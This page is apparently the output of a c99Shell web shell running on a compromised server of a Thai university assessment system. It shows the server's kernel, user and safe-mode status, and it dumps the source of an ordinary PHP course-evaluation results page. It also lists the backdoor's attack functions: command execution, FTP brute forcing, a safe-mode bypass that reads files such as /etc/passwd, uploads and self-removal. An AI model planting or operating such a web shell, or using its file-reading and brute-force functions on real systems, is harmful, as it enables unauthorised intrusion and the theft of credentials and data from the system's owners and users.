!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     2552-05-19-1.0.01-showResultRQCourseTe.php (11.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">    
    <?
    set_time_limit
(0);
    
?>
<table  border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td width="650" >&nbsp;</td><td >&nbsp; </td></tr>
<tr><td width="650">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="silver">
        <tr align="center" bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>">
            <td width="10%">กลุ่ม</td>
            <td width="35%">นศ.ที่ลง<br>ทะเบียน(คน)</td>
            <td width="35%">นศ.ที่เข้า<br >ประเมิน(คน)</td>
            <td width="15%">ร้อยละ</td>
        </tr>
        <? 
            $groupSec
=0;
            
$oDo->CountDoStdOrderSectionByDefineIdCourseIdOfficerid($defineid,$courseId,$officerId);
            while(
$oDo->GetRecord()){                
        
?>
                <tr align="center" bgcolor="#FFFFFF">
            <td ><?=$oDo->section?></td>
            <td ><?=$oDo->num2?></td>
            <td ><?=$oDo->num1?></td>
            <td ><?=number_format($oDo->per,2)?></td>
            </tr>
            <? $groupSec+=1; } ?>
    </table>
    </td></tr>
                      <?      
                    $oSA 
= new SectionAll($oCA);
                    
$numSection$oSA->RSCountSectionAll($assid);
                    
$oSA->RSByKeyAss($assid);
                    
$i 1;
                    
$indexSection 1;
                    while (
$oSA->GetRecord()){
                        
/*---------------- กรณีที่เลือกเป็นคำถามชนิดปลายปิด------------------*/
                        
if($oSA->sectionRQid != '0'){    
                            
//สร้าง oSRQ แสดงหัวข้อของส่วนการประเมิน
                            
$oSRQ = new SectionRQ($oCA);
                            
$oSRQ->RSSectionRQAll($assid,$oSA->sectionRQid);
                            while(
$oSRQ->GetRecord()){
                                
$oHQ = new HeaderQuestion($oCA);
                                
$oHQ->RSHeaderAllBySection($assid,$oSA->sectionRQid);
                                
$oHQ->GetRecord();                
                                
$oHS = new HeaderScore($oCA);
                                
$oHS->RSHeadSAll($oHQ->HSid);
                                
$oHS->GetRecord();        
 
?>
                      <!---------------------------------  Tab1 คำถามปลายปิด -------------------------------------------->
                      
    <tr><td width="650">
    
    <table align="center">
                        <tr> <td>&nbsp;</td>
                        </tr>
                        <tr> 
                          <td valign="top"><font size="2"><span class = "fontMarkTD1"><? if($numSection == '1') { echo "คำอธิบาย"; } else { echo "ส่วนที่ ".$indexSection; }?></span> : </font></td>
                          <td width="518"><font size="2"><? echo $oSRQ->topicSectionRQ ;?></font></td>
                        </tr>
                      </table>
                      <br>
                               <table width="352" border="0" align="center" cellpadding="1" cellspacing="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>">
                               <tr> 
                                <td width="348" height="22"> 
                                <fieldset>
                                    <legend> <font color="<?php echo $GLOBALS["COLOR_FONT_9"]; ?>" size="2">เกณฑ์ประเมินหรือพิจารณาค่าเฉลี่ย</font></legend>
                                    <br>
                                    <table width="86%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
                                          <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>"> 
                                            <td width="43%" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">ช่วงคะแนน</font></td>
                                            <td width="57%" align="center">
                                            <?php if($oHS->HStext == "") { ?> 
                                                     <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"> ** ยังไม่ได้กำหนด ** </font>
                                            <? } else{  ?>
                                                    <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo $oHS->HStext ?></font>
                                            <? ?>
                                            </td>
                                          </tr>
                                     <? 
                                            $ch 
0;
                                            
$oDS = new DetailScore($oCA);
                                              
$oDS->RSDetailSAll($oHS->HSid);
                                              while(
$oDS->GetRecord()){
                                    
?>
                                             <tr> 
                                                  <td align="center" bgcolor="#FFFFFF"><? echo $oDS->CTFirst ?> - <? echo $oDS->CTLast ?></td>
                                                <td bgcolor="#FFFFFF" align="center"><? echo $oDS->DStext ?></td>
                                             </tr>
                                    <? 
                                            
if($ch==0)
                                                
$full_mark $oDS->CTLast;
                                            
$ch++;
                                        } 
// end oDS 
                                    
if($ch == 0){
                                    
?>
                                        <tr bgcolor="#FFFFFF">
                                            <td colspan="2" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"> ** ยังไม่ได้กำหนด ** </font></td>
                                        </tr>
                                    <? ?>
                                    </table>   <br>
                                </fieldset>
                             </td>
                            </tr>
                           </table>
                      <br>
        </td>
        <td >&nbsp; </td>
  </tr>
        <tr><td colspan="2">
                             <table  border="0" cellpadding="1" cellspacing="1" bgcolor="silver">
                            <tr height="20" bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
                            <td  width="480" align="center" rowspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b><? echo $oHQ->HQtext ?></b></font></td>
                            <? for($i=1;$i<=$groupSec;$i++){ ?>
                            <td align="center" colspan="3"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>กลุ่ม<?=$i?> </b></font></td><? ?>
                           </tr>
                           <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
                           <? for($i=1;$i<=$groupSec;$i++){ ?>
                            <td width="39" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>%</b></font></td>
                            <td width="39" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>ค่าเฉลี่ย. </b></font></td>
                            <td width="40" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>ค่า S.D. </b></font></td><? ?>
                           </tr>
                   <?  /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อหลัก -------------------------------------------------------*/
                            
$index1 1$index2 1;
                            
$index_color1 1$index_color2 1;
                            
$CntSubQ 0;  $xbar 0;  $sd 0;
                            
$oRQ = new RadioQuestion($oCA);
                            
$oRQ->RSRadioQByKey($assid,$oSA->sectionRQid,1);
                            while(
$oRQ->GetRecord()){
                                
$oCntRQ = new RadioQuestion($oCA);
                                
$CntSubQ $oCntRQ->RSCountSubRQid($assid,$oRQ->RQid,'2');

            
//            echo $oSA->sectionRQid."--".$oRQ->RQid.'<br>';

                                
if($index_color2%== 0){//EEF2FB
                                    
if($index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }
                                }else{
                                    if(
$index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }
                                }
                        
?>    <td height="22"><? echo $index1."." ?> <? echo $oRQ->nameRQ ?><? //echo "--sectionRQid-".$oSA->sectionRQid."--RQid-".$oRQ->RQid?></td> <?
                            
if($CntSubQ == 0){    
                                
//คิดค่าเฉลี่ยและค่า sd ของคำถามข้อหลัก 
                                
if($ttId==0){
                
//                    $oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid);
                                    
$oRRQ->RSXbarSDEachRQidByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid,$oRQ->RQid);
                                }else
                                    
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid,$ttId);
                                    
$group 1;
                                while(
$oRRQ->GetRecord()){
                                    
$xbar $oRRQ->xbar;
                                    
$sd $oRRQ->sd;
                                    
$per $oRRQ->per;
                                    
                    
?>        
                             <td align="center">
                                  <? if($xbar != 0) echo number_format($per,0);?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                              </td>                   
                              <td align="center">
                                  <? if($xbar != 0) echo number_format($xbar,2);?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                              </td>  
                          <td align="center"> 
                                  <? if($xbar != 0)  echo number_format($sd,2); ?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                          </td>
                 <?                  $group++;
                                     }
                            }                                    
                  
?>
                            </tr>
                   <?  /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อย่อย-------------------------------------------------------*/
                            
$xbarSub 0;  $sdSub 0;
                            
$ocRQ = new RadioQuestion($oCA);
                            
$ocRQ->RSCheckLevel($assid,$oRQ->RQid);
                            while(
$ocRQ->GetRecord()){

                                if(
$index_color1%== 0){//EEF2FB
                                    
if($index_color2%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }
                                }else{
                                    if(
$index_color2%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }
                                }
                                
                                
//คิดค่าเฉลี่ยและค่า sd ขอคำถามข้อย่อย
                                
if($ttId==0)
                            
//        $oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid);
                                    
$oRRQ->RSXbarSDEachRQidByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid,$oRQ->RQid);
                                else
                                    
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid,$ttId);

                                if(
$oRRQ->GetRecord()){
                                    
$xbarSub $oRRQ->xbar;
                                    
$sdSub $oRRQ->sd;
                                }                            
                         
?>
                                <td height="22"><? echo "<img src=\"../picture/blank1.gif\"border=\"0\">".$index1.".".$index2 ?> <? echo $ocRQ->nameRQ ?></td>
                            <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($per,2); ?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                            <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($xbarSub,2); ?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                           <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($sdSub,2);?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                        </tr>
                            <?        
                                  $index2
++;
                                  
$index_color2++;    
                              } 
//end while ocRQ    
                                
$index1++;
                                
$index2 1;
                                
$index_color1++;
                            } 
//end while oRQ

                        
if($ttId==0)
                    
//        $oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid);
                            
$oRRQ->RSXbarSDByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid);
                        else
                            
$oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ttId);
                        
?>
                        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"> 
                            <td height="22" ><div align="right"><font size="2"><b>ภาพรวม</b>&nbsp;</font></div></td>    
                    <?
                        
while($oRRQ->GetRecord()){
                            
$perTotal $oRRQ->per;
                            
$xbarTotal $oRRQ->xbar;
                            
$sdTotal $oRRQ->sd;
                        
?>
                            <td align="center"><b><? echo number_format($perTotal,2); ?></b></td>
                            <td align="center"><b><? echo number_format($xbarTotal,2); ?></b></td>
                            <td align="center"><b><? echo number_format($sdTotal,2); ?></b></td>
                        <? ?>
                        </tr>
                      </table>
     <? 
                    
//end while oSRQ
                 
// end if oSA
                        
$indexSection++;
               } 
//end while oSA 
    
?>
        </td></tr>
</table>
    <?
    set_time_limit
(30);
    
?>


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--